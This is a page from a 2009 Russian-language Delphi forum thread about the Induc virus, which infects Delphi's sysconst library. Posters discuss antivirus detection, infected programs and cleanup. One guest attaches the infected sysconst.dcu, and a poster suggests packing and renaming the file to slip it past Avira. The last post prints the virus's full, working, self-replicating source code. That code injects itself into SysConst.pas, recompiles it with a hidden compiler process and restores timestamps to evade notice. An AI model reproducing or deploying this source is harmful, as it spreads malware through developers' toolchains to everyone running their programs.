Добро пожаловать в форум, Guest  >>   Войти | Регистрация | Поиск | Правила | В избранное | Подписаться
Все форумы / Delphi Новый топик    Ответить
Топик располагается на нескольких страницах: Ctrl  назад   1 2 3 4 5 [6] 7 8   вперед  Ctrl      все
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Anatoly Podgoretsky
Member

Откуда:
Сообщений: 62926
Гаджимурадов Рустам
А я и не спорил. Просто может пронесет...

Статистика показывает, что не пронесет. Хотя идея уже ранее эксплуатировалась, в ДОСе
19 авг 09, 11:27    [7555209]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
debose
Member

Откуда: Maza valsts
Сообщений: 1222
Блог
Насчёт Касперского и прочих антивирусов. Вообще-то есть возможность отправить каждому производителю антивирусов на анализ свой файл. Что и было проделано сознательными гражданами с заражённым sysconst.dcu. :)
19 авг 09, 13:18    [7556048]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Anatoly Podgoretsky
Member

Откуда:
Сообщений: 62926
И сколько из них пропиарилось и сколько из них нашли

--
http://www.podgoretsky.com
19 авг 09, 13:21    [7556063]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
DimaBr
Member

Откуда:
Сообщений: 11048
Результат 17 %
Печально
19 авг 09, 13:50    [7556297]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Evgeshka
Member

Откуда: Украина
Сообщений: 1067
GunSmoker
Если учесть, что эта бяка уже, видимо, не один год бегает по интернету и до сих пор никто ни сном ни духом (в том числе ни один антивирус и антитроян) - есть мнение, что надо оповестить народ.


У меня McAfee на этот вирус начал ругаться, собственно говоря так и узнал что мой Delphi заражен. А до этого днем раньше видел ваш топик в Интернете и не обратил на него внимание.
19 авг 09, 14:18    [7556508]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Evgeshka
Member

Откуда: Украина
Сообщений: 1067
Dmitry Arefiev
Альт
SkyS, в собор сходи... установку варезных компонент замоли

Зря ты его ... Касперский, меня откровенно достал. Я был честным плательщиком
Касперскому. Более - пас. Тормозит, рыдает по каждому пуку, денег просит ...


+1024
19 авг 09, 15:28    [7557116]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
FlyD
Member

Откуда: Москва
Сообщений: 3899
DimaBr
Результат 17 %
Печально
Интересный сервис. Не знал.
19 авг 09, 17:49    [7558173]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Gator
Member

Откуда: Москва
Сообщений: 14270
Ну киньте уж мне в почту этот злосчастный dcu!
Тем более ни одной Delphi нет.
19 авг 09, 23:31    [7558992]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
iscrafm
Member [заблокирован]

Откуда:
Сообщений: 35350
Gator
Ну киньте уж мне в почту этот злосчастный dcu!
Тем более ни одной Delphi нет.

и мне, если можно.
19 авг 09, 23:42    [7559023]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
20.08.2009 года
Guest
Уже 31%

К сообщению приложен файл (sysconst.dcu - 16Kb) cкачать
20 авг 09, 10:04    [7559785]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
iscrafm
Member [заблокирован]

Откуда:
Сообщений: 35350
а почтой? потому что так avira блокирует
20 авг 09, 10:24    [7559924]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
obizor
Member

Откуда:
Сообщений: 113
stardg
Весь вред от этого вируса от !!ДОЛБАННОГО КАСПЕРСКОГО!!!

Эта тварь мне с 15-го августа работать не дает по человечески - ругается на каждый скомпиленный екзешник и блокирует его - причем система тупейшая. Вот скажите мне Если при обнаружении вируса я нажимаю ПРОПУСТИТЬ что должно случится? Вирус игнорируется? ХЕР ТАМ! Он всеравно блокирует файл просто не удаляет его и не лечит....

Вобщем люди кто программирует на делфях и не пользуются каспером спокойно работали и знать не знали что у них есть вирус (а он есть проверили Lib потом).... Вообще непойму вреда и смысла этого вируса если он ничего не делает. Реклама Жени Касперского очередная!


Вобщем Касперский - амно и неедет!
+10
20 авг 09, 10:56    [7560192]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Petro123
Member

Откуда: Загрузочный сектор Москвы (AutoPOI.ru)
Сообщений: 38643
iscrafm
а почтой? потому что так avira блокирует

если запаковать и изменить расширение наверно не будет блокировать.
Или она умнее?
20 авг 09, 10:57    [7560197]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Petro123
Member

Откуда: Загрузочный сектор Москвы (AutoPOI.ru)
Сообщений: 38643
obizor,
чего вы к касперу прицепились? Тем что украли, и он надоедает - купи?
Глупо. Аргументов - 0, только эмоции.
20 авг 09, 10:59    [7560225]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
iscrafm
Member [заблокирован]

Откуда:
Сообщений: 35350
Petro123
iscrafm
а почтой? потому что так avira блокирует

если запаковать и изменить расширение наверно не будет блокировать.
Или она умнее?

так не могу проверить, негде взять. Поэтому и прошу в запакованном виде, почтой. Но для проверки авиры конечно, а посмотреть сам файл.
20 авг 09, 11:02    [7560253]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Petro123
Member

Откуда: Загрузочный сектор Москвы (AutoPOI.ru)
Сообщений: 38643
iscrafm,
а она, что - не выключается?
Каспер есть меню - приостановить работу на .....
20 авг 09, 11:21    [7560438]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
MazoHist
Guest
За dcu спасибо, но от какой он версии дельфей?
20 авг 09, 11:46    [7560663]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Gator
Member

Откуда: Москва
Сообщений: 14270
MazoHist, D6 imho
20 авг 09, 11:52    [7560721]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
FlyD
Member

Откуда: Москва
Сообщений: 3899
Вирус обнаружен в приложении Wise Registry Cleaner ver 4.6.4.209.
Версия 4.7.2.216 чистая. В какой именно сборке или релизе убрали
не известно.
20 авг 09, 22:53    [7564218]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Гаджимурадов Рустам
Member

Откуда:
Сообщений: 59923

FlyD> Вирус обнаружен в приложении Wise Registry Cleaner ver 4.6.4.209.

Это атас.

P.S. Похоже, да, встряли. И клеймить ведь будут...

Posted via ActualForum NNTP Server 1.4

20 авг 09, 23:55    [7564317]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Док
Member

Откуда: Казань
Сообщений: 6164
Гаджимурадов Рустам
Это атас.

"Первомай шагает по планете!" (с) ;)

Почему же у меня ничего не кричит?
зы. D7
21 авг 09, 00:43    [7564402]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Гаджимурадов Рустам
Member

Откуда:
Сообщений: 59923

Док> Почему же у меня ничего не кричит?

Дай угадаю... Кричалка отключена?

P.S. Собственно, вариантов всего четыре:
1. Кричалка отключена.
2. Кричалки просто нет.
3. Кричалка еще не умеет кричать.
4. Кричать просто не на что.

Вариант "ты не слышишь/видишь" не рассматриваем.

Posted via ActualForum NNTP Server 1.4

21 авг 09, 00:55    [7564413]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
ПрохожЫй
Guest
У меня сегодня Symantec проснулся,
AVG до сих пор не реагирует
НОД уже дней пять как чистит мои древние разработки, вирус в программах которые я компилил еще пару лет взад
21 авг 09, 07:26    [7564616]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
MaratIsk
Member

Откуда: Astana, Kazakhstan
Сообщений: 2466
и у меня AVG обнаружил в бинарниках Win32/Induc
заменил sysconst.dcu
помогло

Поиск информации показал
Microsoft Malware Protection Center. Search the malware encyclopedia. ... Virus:Win32/Induc.A is a virus that infects Delphi library source files. ...
22 авг 09, 09:55    [7569385]     Ответить | Цитировать Сообщить модератору
 Re: Delphi-“вирус”: проверьте свою установленную Delphi!  [new]
Alejandro
Member

Откуда:
Сообщений: 177
Если интересно, то вот текст этого вируса.
Так сказать, врага нужно знать в лицо :)

uses windows;

var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]',
'=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s);  if pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.',
'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,',
'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,',
'0,0);  if  h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=',
'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,',
'@t1,@t2,@t3); CloseHandle(h); end; procedure st; var  k:HKEY;c:array [1..255] of',
'char;  i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(',
'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then',
'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=',
'1; while c[i]<>#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+',
'$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;',
'begin st; end.');

function x(s:string):string;
var i:integer;
begin 
  for i:=1 to length(s) do if s[i]=#36 then s[i]:=#39;
  result:=s;
end;

procedure re(s,d,e:string);
var f1,f2:textfile;
    h:cardinal;
    f:STARTUPINFO;
    p:PROCESS_INFORMATION;
    b:boolean;
    t1,t2,t3:FILETIME;
begin
  h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
  if h<>DWORD(-1) then
  begin
    CloseHandle(h);
    exit;
  end;
  {$I-}assignfile(f1,s);
  reset(f1);
  if ioresult<>0 then exit;
  assignfile(f2,d+'pas');
  rewrite(f2);
  if ioresult<>0 then begin closefile(f1); exit; end;

  while not eof(f1) do
  begin
    readln(f1,s);
    writeln(f2,s);
    if pos('implementation',s)<>0 then break;
  end;

  for h:= 1 to 1 do writeln(f2,sc[h]);
  for h:= 1 to 23 do writeln(f2,''''+sc[h],''',');writeln(f2,''''+sc[24]+''');');
  for h:= 2 to 24 do writeln(f2,x(sc[h]));
  closefile(f1);
  closefile(f2);
  {$I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak'));
  fillchar(f,sizeof(f),0);
  f.cb := sizeof(f);
  f.dwFlags := STARTF_USESHOWWINDOW;
  f.wShowWindow := SW_HIDE;
  b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p);
  if b then WaitForSingleObject(p.hProcess,INFINITE);
  MoveFile(pchar(d+'bak'),pchar(d+'dcu'));
  DeleteFile(pchar(d+'pas'));
  h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
  if  h=DWORD(-1) then exit;
  GetFileTime(h,@t1,@t2,@t3);
  CloseHandle(h);
  h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0);
  if h=DWORD(-1) then exit;
  SetFileTime(h,@t1,@t2,@t3);
  CloseHandle(h);
end;

procedure st;
  var  k:HKEY;c:array [1..255] of char;
  i:cardinal;
  r:string;
  v:char;
begin
  for v:='4' to '7' do
    if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then
    begin
      i:=255;
      if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then
      begin
        r:='';
        i:=1;
        while c[i]<>#0 do
        begin
          r:=r+c[i];
          inc(i);
        end;
        re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" ');
      end;
    RegCloseKey(k);
  end;
end;

begin
  st;
end.
22 авг 09, 11:29    [7569417]     Ответить | Цитировать Сообщить модератору
Топик располагается на нескольких страницах: Ctrl  назад   1 2 3 4 5 [6] 7 8   вперед  Ctrl      все
Все форумы / Delphi Ответить